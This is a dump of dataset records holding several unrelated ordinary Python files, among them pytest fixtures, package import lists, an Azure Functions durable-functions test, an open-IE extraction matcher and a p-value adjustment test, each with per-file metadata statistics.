| 18.833333 | 58 | 0.681416 | 17 | 113 | 4.470588 | 0.764706 | 0.210526 | 0.236842 | 0.289474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089888 | 0.212389 | 113 | 6 | 59 | 18.833333 | 0.764045 | 0.495575 | 0 | 0 | 1 | 0 | 0.218182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0bb3f0a42a93eaa1345e58f56c7a51cadcb41550 | 117 | py | Python | tests/conftest.py | briefmnews/django-uploads | c40d6d969ca66e83ec5716d97fdf3a9753e535bd | [
"MIT"
] | null | null | null | tests/conftest.py | briefmnews/django-uploads | c40d6d969ca66e83ec5716d97fdf3a9753e535bd | [
"MIT"
] | null | null | null | tests/conftest.py | briefmnews/django-uploads | c40d6d969ca66e83ec5716d97fdf3a9753e535bd | [
"MIT"
] | null | null | null | import pytest
from .factories import DocumentFactory
@pytest.fixture
def document():
return DocumentFactory()
| 13 | 38 | 0.777778 | 12 | 117 | 7.583333 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 117 | 8 | 39 | 14.625 | 0.919192 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
e7f7c079aeab443c85120d8d4d38bde8944c1724 | 504 | py | Python | zeus/tasks/__init__.py | conrad-kronos/zeus | ddb6bc313e51fb22222b30822b82d76f37dbbd35 | [
"Apache-2.0"
] | null | null | null | zeus/tasks/__init__.py | conrad-kronos/zeus | ddb6bc313e51fb22222b30822b82d76f37dbbd35 | [
"Apache-2.0"
] | null | null | null | zeus/tasks/__init__.py | conrad-kronos/zeus | ddb6bc313e51fb22222b30822b82d76f37dbbd35 | [
"Apache-2.0"
] | null | null | null | from .aggregate_job_stats import * # NOQA
from .cleanup_artifacts import * # NOQA
from .cleanup_builds import * # NOQA
from .cleanup_pending_artifacts import * # NOQA
from .deactivate_repo import * # NOQA
from .delete_repo import * # NOQA
from .process_artifact import * # NOQA
from .process_pending_artifact import * # NOQA
from .process_travis_webhook import * # NOQA
from .resolve_ref import * # NOQA
from .send_build_notifications import * # NOQA
from .sync_github_access import * # NOQA
| 38.769231 | 48 | 0.761905 | 66 | 504 | 5.545455 | 0.378788 | 0.327869 | 0.420765 | 0.172131 | 0.15847 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 504 | 12 | 49 | 42 | 0.871429 | 0.117063 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e7f93e98a16c45c626e20d3f1e1d9ddbc71e4571 | 140 | py | Python | tests/test_certstore.py | joneverett/certstore | 2f3d724cdc34fb88f0bc4d1d9348cb77ca9e6b34 | [
"Apache-2.0"
] | null | null | null | tests/test_certstore.py | joneverett/certstore | 2f3d724cdc34fb88f0bc4d1d9348cb77ca9e6b34 | [
"Apache-2.0"
] | null | null | null | tests/test_certstore.py | joneverett/certstore | 2f3d724cdc34fb88f0bc4d1d9348cb77ca9e6b34 | [
"Apache-2.0"
] | null | null | null | """pytests for certstore package."""
import os
import certstore
def test_bundle_exists():
assert os.path.isfile(certstore.ca_bundle)
| 15.555556 | 46 | 0.757143 | 19 | 140 | 5.421053 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135714 | 140 | 8 | 47 | 17.5 | 0.85124 | 0.214286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6520c8cf18a3d3686c63f985c0ec474d46a5bd30 | 11,862 | py | Python | relationextraction/carb/matcher.py | esborisova/Multi2OIE | 97fca3db385b7698079a508927719b6f4d540407 | [
"MIT"
] | 38 | 2020-09-17T13:57:41.000Z | 2022-03-15T01:17:01.000Z | relationextraction/carb/matcher.py | esborisova/Multi2OIE | 97fca3db385b7698079a508927719b6f4d540407 | [
"MIT"
] | 3 | 2021-03-25T06:00:54.000Z | 2021-09-07T12:57:27.000Z | relationextraction/carb/matcher.py | esborisova/Multi2OIE | 97fca3db385b7698079a508927719b6f4d540407 | [
"MIT"
] | 12 | 2020-11-03T04:39:17.000Z | 2022-02-24T16:57:06.000Z | from __future__ import division
import string
from nltk.translate.bleu_score import sentence_bleu
from nltk.corpus import stopwords
from copy import copy
import ipdb
class Matcher:
@staticmethod
def bowMatch(ref, ex, ignoreStopwords, ignoreCase):
"""
A binary function testing for exact lexical match (ignoring ordering) between reference
and predicted extraction
"""
s1 = ref.bow()
s2 = ex.bow()
if ignoreCase:
s1 = s1.lower()
s2 = s2.lower()
s1Words = s1.split(' ')
s2Words = s2.split(' ')
if ignoreStopwords:
s1Words = Matcher.removeStopwords(s1Words)
s2Words = Matcher.removeStopwords(s2Words)
return sorted(s1Words) == sorted(s2Words)
@staticmethod
def predMatch(ref, ex, ignoreStopwords, ignoreCase):
"""
Return whehter gold and predicted extractions agree on the predicate
"""
s1 = ref.elementToStr(ref.pred)
s2 = ex.elementToStr(ex.pred)
if ignoreCase:
s1 = s1.lower()
s2 = s2.lower()
s1Words = s1.split(' ')
s2Words = s2.split(' ')
if ignoreStopwords:
s1Words = Matcher.removeStopwords(s1Words)
s2Words = Matcher.removeStopwords(s2Words)
return s1Words == s2Words
@staticmethod
def argMatch(ref, ex, ignoreStopwords, ignoreCase):
"""
Return whehter gold and predicted extractions agree on the arguments
"""
sRef = ' '.join([ref.elementToStr(elem) for elem in ref.args])
sEx = ' '.join([ex.elementToStr(elem) for elem in ex.args])
count = 0
for w1 in sRef:
for w2 in sEx:
if w1 == w2:
count += 1
# We check how well does the extraction lexically cover the reference
# Note: this is somewhat lenient as it doesn't penalize the extraction for
# being too long
coverage = float(count) / len(sRef)
return coverage > Matcher.LEXICAL_THRESHOLD
@staticmethod
def bleuMatch(ref, ex, ignoreStopwords, ignoreCase):
sRef = ref.bow()
sEx = ex.bow()
bleu = sentence_bleu(references = [sRef.split(' ')], hypothesis = sEx.split(' '))
return bleu > Matcher.BLEU_THRESHOLD
@staticmethod
def lexicalMatch(ref, ex, ignoreStopwords, ignoreCase):
sRef = ref.bow().split(' ')
sEx = ex.bow().split(' ')
count = 0
#for w1 in sRef:
# if w1 in sEx:
# count += 1
# sEx.remove(w1)
for w1 in sRef:
for w2 in sEx:
if w1 == w2:
count += 1
# We check how well does the extraction lexically cover the reference
# Note: this is somewhat lenient as it doesn't penalize the extraction for
# being too long
coverage = float(count) / len(sRef)
return coverage > Matcher.LEXICAL_THRESHOLD
@staticmethod
def tuple_match(ref, ex, ignoreStopwords, ignoreCase):
precision = [0, 0] # 0 out of 0 predicted words match
recall = [0, 0] # 0 out of 0 reference words match
# If, for each part, any word is the same as a reference word, then it's a match.
predicted_words = ex.pred.split()
gold_words = ref.pred.split()
precision[1] += len(predicted_words)
recall[1] += len(gold_words)
# matching_words = sum(1 for w in predicted_words if w in gold_words)
matching_words = 0
for w in gold_words:
if w in predicted_words:
matching_words += 1
predicted_words.remove(w)
if matching_words == 0:
return False # t <-> gt is not a match
precision[0] += matching_words
recall[0] += matching_words
for i in range(len(ref.args)):
gold_words = ref.args[i].split()
recall[1] += len(gold_words)
if len(ex.args) <= i:
if i<2:
return False
else:
continue
predicted_words = ex.args[i].split()
precision[1] += len(predicted_words)
matching_words = 0
for w in gold_words:
if w in predicted_words:
matching_words += 1
predicted_words.remove(w)
if matching_words == 0 and i<2:
return False # t <-> gt is not a match
precision[0] += matching_words
# Currently this slightly penalises systems when the reference
# reformulates the sentence words, because the reformulation doesn't
# match the predicted word. It's a one-wrong-word penalty to precision,
# to all systems that correctly extracted the reformulated word.
recall[0] += matching_words
prec = 1.0 * precision[0] / precision[1]
rec = 1.0 * recall[0] / recall[1]
return [prec, rec]
# STRICTER LINIENT MATCH
def linient_tuple_match(ref, ex, ignoreStopwords, ignoreCase):
precision = [0, 0] # 0 out of 0 predicted words match
recall = [0, 0] # 0 out of 0 reference words match
# If, for each part, any word is the same as a reference word, then it's a match.
predicted_words = ex.pred.split()
gold_words = ref.pred.split()
precision[1] += len(predicted_words)
recall[1] += len(gold_words)
# matching_words = sum(1 for w in predicted_words if w in gold_words)
matching_words = 0
for w in gold_words:
if w in predicted_words:
matching_words += 1
predicted_words.remove(w)
# matching 'be' with its different forms
forms_of_be = ["be","is","am","are","was","were","been","being"]
if "be" in predicted_words:
for form in forms_of_be:
if form in gold_words:
matching_words += 1
predicted_words.remove("be")
break
if matching_words == 0:
return [0,0] # t <-> gt is not a match
precision[0] += matching_words
recall[0] += matching_words
for i in range(len(ref.args)):
gold_words = ref.args[i].split()
recall[1] += len(gold_words)
if len(ex.args) <= i:
if i<2:
return [0,0] # changed
else:
continue
predicted_words = ex.args[i].split()
precision[1] += len(predicted_words)
matching_words = 0
for w in gold_words:
if w in predicted_words:
matching_words += 1
predicted_words.remove(w)
precision[0] += matching_words
# Currently this slightly penalises systems when the reference
# reformulates the sentence words, because the reformulation doesn't
# match the predicted word. It's a one-wrong-word penalty to precision,
# to all systems that correctly extracted the reformulated word.
recall[0] += matching_words
if(precision[1] == 0):
prec = 0
else:
prec = 1.0 * precision[0] / precision[1]
if(recall[1] == 0):
rec = 0
else:
rec = 1.0 * recall[0] / recall[1]
return [prec, rec]
@staticmethod
def simple_tuple_match(ref, ex, ignoreStopwords, ignoreCase):
ref.args = [ref.args[0], ' '.join(ref.args[1:])]
ex.args = [ex.args[0], ' '.join(ex.args[1:])]
precision = [0, 0] # 0 out of 0 predicted words match
recall = [0, 0] # 0 out of 0 reference words match
# If, for each part, any word is the same as a reference word, then it's a match.
predicted_words = ex.pred.split()
gold_words = ref.pred.split()
precision[1] += len(predicted_words)
recall[1] += len(gold_words)
matching_words = 0
for w in gold_words:
if w in predicted_words:
matching_words += 1
predicted_words.remove(w)
precision[0] += matching_words
recall[0] += matching_words
for i in range(len(ref.args)):
gold_words = ref.args[i].split()
recall[1] += len(gold_words)
if len(ex.args) <= i:
break
predicted_words = ex.args[i].split()
precision[1] += len(predicted_words)
matching_words = 0
for w in gold_words:
if w in predicted_words:
matching_words += 1
predicted_words.remove(w)
precision[0] += matching_words
# Currently this slightly penalises systems when the reference
# reformulates the sentence words, because the reformulation doesn't
# match the predicted word. It's a one-wrong-word penalty to precision,
# to all systems that correctly extracted the reformulated word.
recall[0] += matching_words
prec = 1.0 * precision[0] / precision[1]
rec = 1.0 * recall[0] / recall[1]
return [prec, rec]
# @staticmethod
# def binary_linient_tuple_match(ref, ex, ignoreStopwords, ignoreCase):
# if len(ref.args)>=2:
# # r = ref.copy()
# r = copy(ref)
# r.args = [ref.args[0], ' '.join(ref.args[1:])]
# else:
# r = ref
# if len(ex.args)>=2:
# # e = ex.copy()
# e = copy(ex)
# e.args = [ex.args[0], ' '.join(ex.args[1:])]
# else:
# e = ex
# return Matcher.linient_tuple_match(r, e, ignoreStopwords, ignoreCase)
@staticmethod
def binary_linient_tuple_match(ref, ex, ignoreStopwords, ignoreCase):
if len(ref.args)>=2:
r = copy(ref)
r.args = [ref.args[0], ' '.join(ref.args[1:])]
else:
r = ref
if len(ex.args)>=2:
e = copy(ex)
e.args = [ex.args[0], ' '.join(ex.args[1:])]
else:
e = ex
stright_match = Matcher.linient_tuple_match(r, e, ignoreStopwords, ignoreCase)
said_type_reln = ["said", "told", "added", "adds", "says", "adds"]
said_type_sentence = False
for said_verb in said_type_reln:
if said_verb in ref.pred:
said_type_sentence = True
break
if not said_type_sentence:
return stright_match
else:
if len(ex.args)>=2:
e = copy(ex)
e.args = [' '.join(ex.args[1:]), ex.args[0]]
else:
e = ex
reverse_match = Matcher.linient_tuple_match(r, e, ignoreStopwords, ignoreCase)
return max(stright_match, reverse_match)
@staticmethod
def binary_tuple_match(ref, ex, ignoreStopwords, ignoreCase):
if len(ref.args)>=2:
# r = ref.copy()
r = copy(ref)
r.args = [ref.args[0], ' '.join(ref.args[1:])]
else:
r = ref
if len(ex.args)>=2:
# e = ex.copy()
e = copy(ex)
e.args = [ex.args[0], ' '.join(ex.args[1:])]
else:
e = ex
return Matcher.tuple_match(r, e, ignoreStopwords, ignoreCase)
@staticmethod
def removeStopwords(ls):
return [w for w in ls if w.lower() not in Matcher.stopwords]
# CONSTANTS
BLEU_THRESHOLD = 0.4
LEXICAL_THRESHOLD = 0.5 # Note: changing this value didn't change the ordering of the tested systems
stopwords = stopwords.words('english') + list(string.punctuation)
| 34.785924 | 104 | 0.546872 | 1,442 | 11,862 | 4.407074 | 0.128988 | 0.068293 | 0.042486 | 0.051928 | 0.785681 | 0.773407 | 0.763493 | 0.739575 | 0.717231 | 0.699607 | 0 | 0.023483 | 0.353819 | 11,862 | 340 | 105 | 34.888235 | 0.80561 | 0.228966 | 0 | 0.74026 | 0 | 0 | 0.008659 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.025974 | 0.004329 | 0.164502 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6542b8234f584576cc68a06ca1ee225cc7a56fef | 30 | py | Python | python/ql/test/query-tests/Metrics/imports/module2.py | vadi2/codeql | a806a4f08696d241ab295a286999251b56a6860c | [
"MIT"
] | 4,036 | 2020-04-29T00:09:57.000Z | 2022-03-31T14:16:38.000Z | python/ql/test/query-tests/Metrics/imports/module2.py | vadi2/codeql | a806a4f08696d241ab295a286999251b56a6860c | [
"MIT"
] | 2,970 | 2020-04-28T17:24:18.000Z | 2022-03-31T22:40:46.000Z | python/ql/test/query-tests/Metrics/imports/module2.py | ScriptBox99/github-codeql | 2ecf0d3264db8fb4904b2056964da469372a235c | [
"MIT"
] | 794 | 2020-04-29T00:28:25.000Z | 2022-03-30T08:21:46.000Z | import module3
import module4
| 10 | 14 | 0.866667 | 4 | 30 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 0.133333 | 30 | 2 | 15 | 15 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3306e863bd95f24accccae9685dd4d193bd16df5 | 125 | py | Python | pixutils/vplayer/__init__.py | dark1729dragon/pixutils | 41308a84f979e610edc757d3c2321f89f2a74bc2 | [
"BSD-2-Clause"
] | 1 | 2017-10-06T19:02:11.000Z | 2017-10-06T19:02:11.000Z | pixutils/vplayer/__init__.py | dark1729dragon/pixutils | 41308a84f979e610edc757d3c2321f89f2a74bc2 | [
"BSD-2-Clause"
] | null | null | null | pixutils/vplayer/__init__.py | dark1729dragon/pixutils | 41308a84f979e610edc757d3c2321f89f2a74bc2 | [
"BSD-2-Clause"
] | null | null | null | from __future__ import nested_scopes, generators, division, absolute_import, with_statement, print_function, unicode_literals | 125 | 125 | 0.88 | 15 | 125 | 6.733333 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072 | 125 | 1 | 125 | 125 | 0.87069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
3352837c7f041b21fcd93b6b60597dbee37ac4c6 | 32 | py | Python | UserFolder/__init__.py | legopitstop/User | b09ffaf9e9ee6dda85a7a3ca52d898b5c224117d | [
"MIT"
] | null | null | null | UserFolder/__init__.py | legopitstop/User | b09ffaf9e9ee6dda85a7a3ca52d898b5c224117d | [
"MIT"
] | null | null | null | UserFolder/__init__.py | legopitstop/User | b09ffaf9e9ee6dda85a7a3ca52d898b5c224117d | [
"MIT"
] | null | null | null | from UserFolder.User import User | 32 | 32 | 0.875 | 5 | 32 | 5.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 32 | 1 | 32 | 32 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
681d19328e7478e3e91c292f0802db115c0e0ab2 | 23 | py | Python | nannotate/__init__.py | timkpaine/nannotate | 620fe249764a76489b319c0c7394b8aef1efd649 | [
"Apache-2.0"
] | 10 | 2018-06-01T16:21:48.000Z | 2018-10-19T19:42:19.000Z | nannotate/__init__.py | timkpaine/nannotate | 620fe249764a76489b319c0c7394b8aef1efd649 | [
"Apache-2.0"
] | 9 | 2018-06-05T04:27:51.000Z | 2018-10-05T14:34:19.000Z | nannotate/__init__.py | timkpaine/nannotate | 620fe249764a76489b319c0c7394b8aef1efd649 | [
"Apache-2.0"
] | 2 | 2019-10-18T07:01:35.000Z | 2019-11-27T17:54:21.000Z | from .annotate import * | 23 | 23 | 0.782609 | 3 | 23 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 23 | 1 | 23 | 23 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
68714a6b43c845f69b3673c77bb97bce36655fc6 | 5,998 | py | Python | tests/unittests/test_mock_durable_functions.py | gohar94/azure-functions-python-worker | 4322e53ddbcc1eea40c1b061b42653336d9003f6 | [
"MIT"
] | 277 | 2018-01-25T23:13:03.000Z | 2022-02-22T06:12:04.000Z | tests/unittests/test_mock_durable_functions.py | gohar94/azure-functions-python-worker | 4322e53ddbcc1eea40c1b061b42653336d9003f6 | [
"MIT"
] | 731 | 2018-01-18T18:54:38.000Z | 2022-03-29T00:01:46.000Z | tests/unittests/test_mock_durable_functions.py | YunchuWang/azure-functions-python-worker | 1f23e038a506c6412e4efbf07eb471a6afab0c2a | [
"MIT"
] | 109 | 2018-01-18T02:22:57.000Z | 2022-02-15T18:59:54.000Z | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from azure_functions_worker import protos
from azure_functions_worker import testutils
class TestDurableFunctions(testutils.AsyncTestCase):
durable_functions_dir = testutils.UNIT_TESTS_FOLDER / 'durable_functions'
async def test_mock_activity_trigger(self):
async with testutils.start_mockhost(
script_root=self.durable_functions_dir) as host:
func_id, r = await host.load_function('activity_trigger')
self.assertEqual(r.response.function_id, func_id)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
_, r = await host.invoke_function(
'activity_trigger', [
# According to Durable Python
# Activity Trigger's input must be json serializable
protos.ParameterBinding(
name='input',
data=protos.TypedData(
string='test single_word'
)
)
]
)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
self.assertEqual(
r.response.return_value,
protos.TypedData(json='"test single_word"')
)
async def test_mock_activity_trigger_no_anno(self):
async with testutils.start_mockhost(
script_root=self.durable_functions_dir) as host:
func_id, r = await host.load_function('activity_trigger_no_anno')
self.assertEqual(r.response.function_id, func_id)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
_, r = await host.invoke_function(
'activity_trigger_no_anno', [
# According to Durable Python
# Activity Trigger's input must be json serializable
protos.ParameterBinding(
name='input',
data=protos.TypedData(
string='test multiple words'
)
)
]
)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
self.assertEqual(
r.response.return_value,
protos.TypedData(json='"test multiple words"')
)
async def test_mock_activity_trigger_dict(self):
async with testutils.start_mockhost(
script_root=self.durable_functions_dir) as host:
func_id, r = await host.load_function('activity_trigger_dict')
self.assertEqual(r.response.function_id, func_id)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
_, r = await host.invoke_function(
'activity_trigger_dict', [
# According to Durable Python
# Activity Trigger's input must be json serializable
protos.ParameterBinding(
name='input',
data=protos.TypedData(
json='{"bird": "Crane"}'
)
)
]
)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
self.assertEqual(
r.response.return_value,
protos.TypedData(json='{"bird": "enarC"}')
)
async def test_mock_activity_trigger_int_to_float(self):
async with testutils.start_mockhost(
script_root=self.durable_functions_dir) as host:
func_id, r = await host.load_function(
'activity_trigger_int_to_float')
self.assertEqual(r.response.function_id, func_id)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
_, r = await host.invoke_function(
'activity_trigger_int_to_float', [
# According to Durable Python
# Activity Trigger's input must be json serializable
protos.ParameterBinding(
name='input',
data=protos.TypedData(
json=str(int(10))
)
)
]
)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
self.assertEqual(
r.response.return_value,
protos.TypedData(json='-11.0')
)
async def test_mock_orchestration_trigger(self):
async with testutils.start_mockhost(
script_root=self.durable_functions_dir) as host:
func_id, r = await host.load_function('orchestration_trigger')
self.assertEqual(r.response.function_id, func_id)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
_, r = await host.invoke_function(
'orchestration_trigger', [
protos.ParameterBinding(
name='context',
data=protos.TypedData(
string='Durable functions coming soon'
)
)
]
)
self.assertEqual(r.response.result.status,
protos.StatusResult.Success)
self.assertEqual(
r.response.return_value,
protos.TypedData(json='Durable functions coming soon :)')
)
| 39.202614 | 77 | 0.523841 | 527 | 5,998 | 5.755218 | 0.170778 | 0.098912 | 0.105506 | 0.158259 | 0.850643 | 0.824926 | 0.776459 | 0.776459 | 0.776459 | 0.776459 | 0 | 0.001399 | 0.404135 | 5,998 | 152 | 78 | 39.460526 | 0.84723 | 0.067523 | 0 | 0.533333 | 0 | 0 | 0.078825 | 0.034038 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0 | false | 0 | 0.016667 | 0 | 0.033333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
68ac04f6134eeeb761fedf49540b8ac62e23b3f1 | 3,520 | py | Python | tests/.ipynb_checkpoints/scratch-checkpoint.py | UBC-MDS/p_toolkit_Python | d482736fb9a3bbca93fe0bc86cacf4dc6d5745ba | [
"MIT"
] | null | null | null | tests/.ipynb_checkpoints/scratch-checkpoint.py | UBC-MDS/p_toolkit_Python | d482736fb9a3bbca93fe0bc86cacf4dc6d5745ba | [
"MIT"
] | 3 | 2018-02-14T19:15:24.000Z | 2018-02-14T19:36:58.000Z | tests/.ipynb_checkpoints/scratch-checkpoint.py | UBC-MDS/p_toolkit_Python | d482736fb9a3bbca93fe0bc86cacf4dc6d5745ba | [
"MIT"
] | 4 | 2018-03-13T06:21:24.000Z | 2021-02-14T22:10:47.000Z | def test_p_adjust():
"""
The purpose of this test is evaluating the p_adjust with more real world data using Pandas dataframes under
different environments.
"""
d = {"p_value": [0.07], "bonf_value": [0.05], "bonf_significant": [False], "bh_value": [0.05],
"bh_significant": [False]}
df = pd.DataFrame(data=d)
df = df[['p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
test = p_adjust(data=[0.07], alpha=0.05)
test = test[['p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
assert test.equals(df), "p_adjust 1 value vector, FALSE"
d = {"p_value": [0.01], "bonf_value": [0.05], "bonf_significant": [True], "bh_value": [0.05],
"bh_significant": [True]}
df = pd.DataFrame(data=d)
df = df[['p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
test = p_adjust(data=[0.01], alpha=0.05)
test = test[['p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
assert test.equals(df), "p_adjust 1 value vector, TRUE"
d = {"Test": ["test 1", "test 2"], "p_value": [0.01, 0.03], "bonf_value": [0.025, 0.025],
"bonf_significant": [True, False], "bh_value": [0.025, 0.05], "bh_significant": [True, True]}
df = pd.DataFrame(data=d)
df = df[['p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
test = p_adjust(data=[0.01, 0.03], alpha=0.05)
test = test[['p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
assert test.equals(df), "p_adjust 2 values vector "
###dataframe tests
d = {"Test": ["test 1"], "p_value": [0.01]}
df = pd.DataFrame(data=d)
ad = {"Test": ["test 1"], "p_value": [0.01], "bonf_value": [0.05], "bonf_significant": [True], "bh_value": [0.05],
"bh_significant": [True]}
adf = pd.DataFrame(data=ad)
adf = adf[['Test', 'p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
test = p_adjust(data=df, pv_index="p_value", alpha=0.05)
test = test[['Test', 'p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
assert test.equals(adf), "p_adjust 2 values dataframe "
d = {"Test": ["test 1"], "p_value": [0.1]}
df = pd.DataFrame(data=d)
ad = {"Test": ["test 1"], "p_value": [0.1], "bonf_value": [0.05], "bonf_significant": [False], "bh_value": [0.05],
"bh_significant": [False]}
adf = pd.DataFrame(data=ad)
adf = adf[['Test', 'p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
test = p_adjust(data=df, pv_index="p_value", alpha=0.05)
test = test[['Test', 'p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
assert test.equals(adf), "p_adjust 2 values dataframe "
d = {"Test": ["test 1", "test 2"], "p_value": [0.01, 0.03]}
df = pd.DataFrame(data=d)
ad = {"Test": ["test 1", "test 2"], "p_value": [0.01, 0.03], "bonf_value": [0.025, 0.025],
"bonf_significant": [True, False], "bh_value": [0.025, 0.05], "bh_significant": [True, True]}
adf = pd.DataFrame(data=ad)
adf = adf[['Test', 'p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
test = p_adjust(data=df, pv_index="p_value", alpha=0.05)
test = test[['Test', 'p_value', 'bh_value', 'bh_significant', 'bonf_value', 'bonf_significant']]
assert test.equals(adf), "p_adjust 2 values dataframe "
# data is not empty
with pytest.raises(TypeError):
